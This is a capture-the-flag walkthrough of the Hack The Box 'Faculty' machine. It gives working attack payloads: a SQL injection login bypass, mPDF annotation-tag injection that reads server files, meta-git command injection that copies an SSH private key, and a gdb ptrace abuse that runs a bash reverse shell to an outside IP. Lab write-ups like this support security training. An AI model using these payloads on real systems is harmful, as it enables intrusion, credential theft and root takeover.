Faculty — Hackthebox walkthrough
Nmap reveals 2open ports
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| 3072 e9:41:8c:e5:54:4d:6f:14:98:76:16:e7:29:2d:02:16 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzpbkoBfa0UKxT+Giw4wE1jz82gGRpuANEdRt+D6gp6hDmrcaODUiU/N+4nX08jcFBk103cLwU8VisxyRu3wHMTHXaYx2WMZXPtb8clv3Hrt+q2m4eL+DBJMkHO10qCx1IwfYcNyJA3CNCj88X8RgWIREalYWyNHeQFzAHZx4SSrCP9aW5QKqAYVAAS4Za0pts4HVYlfuOrxFgO/Z3FL3xynYeyLrFM+iEx0cMl9rIYWG8NzqVnBe180u+7d/y/kcsZU6MkBMmqWQlGA6o4srVx73AqbUDChkv8glvq0ZbD1JYmACuMCdn/GFI8lRlKaw1BaYeuP0l6qgbb65ghdECYEXC3iycPkR77D6gMbIbg4F9wvzD9AF//aCR+6t8F29DyP/mh1J8a+yiUHY2HJJaDvB5vQLg5Y++9yNEDmxlGFQTdJm/n7YhP2Qj+lkfgsERAO9pfIWGCCWaXl6fddUG4gp1bHLZkek+exgsimU7hApGFrJCtYPkf78xC3pvxx0=
| 256 43:75:10:3e:cb:78:e9:52:0e:eb:cf:7f:fd:f6:6d:3d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH8WAd+YlbEo4Fpz3+UaOYyCJGFa/E29JORgMAIOXVlGUpvMgQqiaqDMXtbt/G03rGEI9h8dpFAmswN1LJ8uig=
| 256 c1:1c:af:76:2b:56:e8:b3:b8:8a:e9:69:73:7b:e6:f5 (ED25519)
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://faculty.htb
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Going to port 80, we are redirected to
http://faculty.htb so we add this to our
/etc/hosts file and continue.
http://faculty.htb we are presented with a form to put in an ID.
Since I ddin’t know a specific ID, I tired to bypass this with SQLi. Trying
' or 1=1 -- - in this field, I was able to bypass the ID verification and login as
Smith, John C
Then I started to fuzz the webroot for hidden directories.
feroxbuster -u http://faculty.htb -w /usr/share/wordlists/dirb/small.txt
And I saw there was a directory called
admin Visiting there, I was presented with a menu which I was able to choose from. I was able to download the different courses and the faculties that was available.
Once I downloaded the PDF file, I used exiftool to look at the meta data.
mPDF is used to make the pdf file.
mPDF is a module that is used to convert html content to pdf. Looking for different issues, in this module, I found one which allowed me to read files as an attachment from the server through HTML injection.
Make annotation tags disabled by default · Issue #356 · mpdf/mpdf
During a security test I was able to inject HTML code into a PDF document that was generated by mPDF. By abusing the…
If we intercept the request that is sent to the
download.php when we click on the PDF icon, we can see that a heap of base64 encoded data is sent. We can use cyberchef to decode it to plain text.
That way, we understand that the contents of the fields are encoded in a pattern
So to decode it, we have to use these layers in the reverse order.
Now that we know this, we can try to send the payload from the issue we found to test for a possible LFI.
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
We encode this payload and send it along.
Once that’s done, we are presented to download a PDF file like usual. Looking at the attachments, we see a file called
We can download it and verify that we indeed have LFI.
Now that LFI, is confirmed, we can look at the files of the PHP application we saw. Since this is an opensource application we can look at what files could be there worth looking into.
So I downloaded the application and went looking around. Then I found an interesting file which was
So I tried to include that file. We can find the place where the web app is located on the server using a request with an invalid parameter (
id_no_1)to the ID verification field we saw earlier.
Since, the full path of the file should be
/var/www/scheduling/admin/db_connect.php Including this using, we get the credentials to login as the
gbyolo user using ssh
<annotation file="/var/www/scheduling/admin/db_connect.php" content="/var/www/scheduling/admin/db_connect.php" icon="Graph"
title="Attached File: /var/www/scheduling/admin/db_connect.php" pos-x="195" />
sudo -l as
gbyolo user, I saw I can run
Googling around, I found a command injection vulnerability for this utility.
Node.js third-party modules disclosed on HackerOne: [meta-git] RCE...
I would like to report a `RCE` issue in the `meta-git` module. It allows to execute `arbitrary commands remotely inside…
Using this I was able to grab the ssh key of the developer user.
sudo -u developer /usr/local/bin/meta-git clone 'sss||cat /home/developer/.ssh/id_rsa > /tmp/kavi'
Using this I logged in as the
developer I saw
cap_sys_ptrace+ep capability was set to
With a quick google search I was able to find a way to exploit this.
CapAmb: The ambient capability set applies to all non-SUID binaries without file capabilities. It preserves…
First I had to find a process running by root which had the
system function in it’s context. (
system is useful to execute commands)
ps aux|grep root
Among these, I found
python3 was running by root.
This was perfect for this job, as this has
system function in it’s context. You can verify that by using
objdump -D /usr/bin/python3|grep system
I noted down the PID of the process which was
Then all I had to so was to attach to that process and call
system which would give me command execution as root.
gdb -p 719
call (void)system("bash -c 'bash -i >& /dev/tcp/10.10.14.95/9090 0>&1'")
Then I got a root shell on my listener.